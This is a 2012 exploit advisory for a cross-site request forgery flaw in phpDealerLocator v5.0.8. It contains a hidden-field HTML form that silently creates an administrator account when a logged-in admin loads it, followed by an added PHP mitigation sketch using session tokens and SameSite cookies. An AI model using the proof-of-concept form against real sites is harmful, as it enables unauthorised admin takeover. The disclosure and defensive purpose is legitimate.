phpDealerLocator v5.0.8 CSRF Vulnerability (Add Admin)

Author: Aboud-el, Published: 09-06-2012
phpDealerLocator v5.0.8 CSRF Vulnerability (Add Admin)
====================================================================

.:. Author : Aboud-el [aboud_el@hotmail.com]
.:. Script : http://www.yourphppro.com/version/en-us/content/page_4.html

===[ Exploit ]===

<html>
<body>
<form method="POST" name="form0" action="http://SITE/admin/edit_users.php?ccsForm=users">
<input type="hidden" name="Users_FullName" value="...."/>
<input type="hidden" name="Users_EmailAddress" value="...."/>
<input type="hidden" name="Users_Login" value="...."/>
<input type="hidden" name="Users_Password" value="...."/>
<input type="hidden" name="Users_Access" value="1"/>
<input type="hidden" name="Button_Insert.x" value="25"/>
<input type="hidden" name="Button_Insert.y" value="15"/>
<input type="hidden" name="Button_Insert" value="Insert"/>
<input type="hidden" name="Users_Password_Shadow" value=""/>
</form>
<form method="GET" name="form1" action="http://SITE/admin/list_users.php?">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>


####################################################################
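
.:. Mitigation sketch (added example, not part of the original advisory and not phpDealerLocator code). The form above carries no per-session token, so the handler cannot tell a cross-site POST from one made in the admin panel. The helper names and the csrf_token field below are hypothetical; the cookie settings assume the admin area is served over HTTPS.

```php
<?php
declare(strict_types=1);

// Issue (or reuse) a per-session token. The admin form embeds it as:
//   <input type="hidden" name="csrf_token"
//          value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the POST body carries the token stored in this session.
// A form hosted on another site cannot read the token, so it cannot supply it.
function csrf_request_ok(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false; // no token issued yet, or an array was sent instead of a string
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Defence in depth: SameSite=Strict keeps the browser from attaching the
// session cookie to cross-site requests (array form needs PHP 7.3+).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,     // assumption: admin area is HTTPS-only
    'samesite' => 'Strict',
]);
session_start();

// Guard placed at the top of a state-changing handler such as
// admin/edit_users.php, before any user row is inserted or updated.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && !csrf_request_ok($_POST, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```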